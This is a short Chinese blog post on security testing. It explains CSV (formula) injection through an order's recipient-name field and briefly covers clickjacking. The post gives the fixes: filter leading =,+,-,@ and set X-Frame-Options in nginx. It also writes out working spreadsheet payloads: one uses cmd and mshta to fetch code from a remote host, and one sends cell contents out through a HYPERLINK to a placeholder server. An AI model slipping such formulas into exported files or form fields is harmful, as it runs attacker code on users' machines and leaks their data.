热门标签
热门文章
- 1【Kafka】Kafka架构(五)_kafka的data目录设置
- 2MapReduce编程实践_eclipse安装后mapreduce localtion文件显示为0
- 3开启SMB1协议_smb1 c#
- 4python创建指定版本的虚拟环境_python 创建虚拟环境的时候指定python版本
- 5MAC下Burpsuite设置图标启动_burpsuite ico
- 6【Git】Git 最重要最常用的场景使用与对应命令-PR修改提交_git怎么修改pr
- 7苦熬一个月,写给Java软件工程师的3条建议_java工程师建议
- 8Hadoop与Spark等大数据框架介绍
- 9魔众文档云端转换支持清晰度设置_本地转换时需配置soffice路径
- 10CSS的l_css path d="m 950 630 l 950 580 l 511.39 128.43
当前位置: article > 正文
安全测试 csv 注入_csv注入危害
作者:盐析白兔 | 2024-08-14 12:32:58
赞
踩
csv注入危害
-
csv 注入
用户下单时,收货人姓名为 =cmd|A1!A1 ,下单后 在订单系统可导出订单到csv , 则=cmd|A1!A1 则在csv 的收货人列中的某单元格中, 是可以触发打开cmd 的,黑客是可以通过cmd 做一些危险操作,比如: =+1+cmd|’/c mshta.exehttp://192.168.233.102:8080/a’!A0
=HYPERLINK(“http://vps_ip?test=”&A2&A3,“Error: Please click me!”) 这种 可把csv 中的数据泄露
方案: 输入文本中=,+,-,@ 需要过滤 -
点击挟持:ngnix 增加X-frame-options :always 配置 确保不会出现iframe 覆盖页面,篡改点击请求
本文内容由网友自发贡献,转载请注明出处:【wpsshop博客】
推荐阅读
相关标签
